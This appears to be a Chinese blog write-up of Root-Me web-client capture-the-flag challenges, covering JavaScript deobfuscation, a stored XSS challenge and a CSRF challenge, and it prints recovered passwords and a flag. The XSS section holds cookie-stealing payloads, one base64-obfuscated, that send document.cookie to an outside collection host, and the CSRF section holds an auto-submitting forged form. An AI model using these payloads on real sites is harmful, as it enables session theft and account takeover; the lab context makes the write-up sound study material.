NEKO

root-me web-client

2018/04/04

我忘了保存了,写了一半的wp没了,有点悲伤,甚至想撸一把猫。

HTML - disabled buttons

手动post

1
auth-login=admin&authbutton=Member access

Javascript - Authentication

源码,login.js

Javascript - Source

源码

Javascript - Authentication 2

源码,login.js

Javascript - Obfuscation 1

源码,url解码

Javascript - Obfuscation 2

unescape%28%22String.fromCharCode%2528104%252C68%252C117%252C102%252C106%252C100%252C107%252C105%252C49%252C53%252C54%2529%22%29")
放到http://tool.chinaz.com/tools/urlencode.aspx
里url解码两次就会得到

1
unescape("String.fromCharCode(104,68,117,102,106,100,107,105,49,53,54)")")

String.fromCharCode(104,68,117,102,106,100,107,105,49,53,54)
放到控制台运行就能得到hDufjdki156

Javascript - Native code

有了火狐的JavaScript Deobfuscator插件,我再也不怕js混淆了呢(前提是能在控制台执行,不要用firebug)
JavaScript Deobfuscator捕捉的源码:

1
2
3
4
5
6
a = prompt('Entrez le mot de passe');
if (a == 'toto123lol') {
alert('bravo');
} else {
alert('fail...');
}

或者把最后的()去掉在控制台输出。

Javascript - Obfuscation 3

源代码
关键在于

1
String["fromCharCode"](dechiffre("\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30"));

python脚本处理下

1
2
3
4
5
6
7
8
from __future__ import print_function
s1=[0x35,0x35,0x2c,0x35,0x36,0x2c,0x35,0x34,0x2c,0x37,0x39,0x2c,0x31,0x31,0x35,0x2c,0x36,0x39,0x2c,0x31,0x31,0x34,0x2c,0x31,0x31,0x36,0x2c,0x31,0x30,0x37,0x2c,0x34,0x39,0x2c,0x35,0x30]
for i in s1:
print(chr(i),end='')
s2=[55,56,54,79,115,69,114,116,107,49,50]
print()
for i in s2:
print(chr(i),end='')

结果:

1
786OsErtk12

XSS - Stored 1

xss窃取cookie
xss平台:http://xsspt.com/
用默认模块创建一个项目
配置好后,进入项目,点右上角的查看代码
记下里面的url。

1
<script>var img=document.createElement("img");img.src = "http://xsspt.com/Ho2v3T?1522993191?" + escape(document.cookie);document.body.appendChild(img);</script>

或者:

1
<img src=x onerror=eval(atob('s=createElement('script');body.appendChild(s);s.src='aHR0cDovL3hzc3B0LmNvbS9LcEhQeG8/Jytlc2NhcGUoZG9jdW1lbnQuY29va2llKQ=='))>

(里面的src都是我的地址,要换成自己的地址)
发送后,xss平台就会收到cookie

CSRF - 0 protection

创建一个账户:neko
有四个选项
1.Contact,可以给管理员发消息,此处存在xss,可以用

1
<img src=x onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8veHNzcHQuY29tL0hvMnYzVD8nK01hdGgucmFuZG9tKCk='))>

来验证。
尝试弹cookie,没成功(对xss不太熟,可能操作有问题)

2.profile
有个表单,其中的status无法选中,思路应该是用csrf把status设为认证状态
3.private
显示没有验证,这应该是看flag的地方

方法:

在contact处随便写个邮箱,评论处写:

1
2
3
4
5
6
<form id="csrf" method="post" enctype="multipart/form-data" action="http://challenge01.root-me.org/web-client/ch22/?action=profile">
<input type="text" name="username" value="neko">
<input type="checkbox" name="status" checked>
<button type="submit">Submit</button>
</form>
<script>document.getElementById("csrf").submit()</script>

等个半分钟
在Private处就能发现flag:
Csrf_Fr33style-L3v3l1!

Flash - Authentication

fuck!做完会的回来填坑

CSRF - token bypass

fuck!这个也不会

XSS - Reflected

fuck!…

Javascript - Obfuscation 4

原文作者: n3k0

发表日期: April 4th 2018, 5:08:26

发出嘶吼: 没有魔夜2玩我要死了

CATALOG
  1. 1. HTML - disabled buttons
  2. 2. Javascript - Authentication
  3. 3. Javascript - Source
  4. 4. Javascript - Authentication 2
  5. 5. Javascript - Obfuscation 1
  6. 6. Javascript - Obfuscation 2
  7. 7. Javascript - Native code
  8. 8. Javascript - Obfuscation 3
  9. 9. XSS - Stored 1
  10. 10. CSRF - 0 protection
  11. 11. Flash - Authentication
  12. 12. CSRF - token bypass
  13. 13. XSS - Reflected
  14. 14. Javascript - Obfuscation 4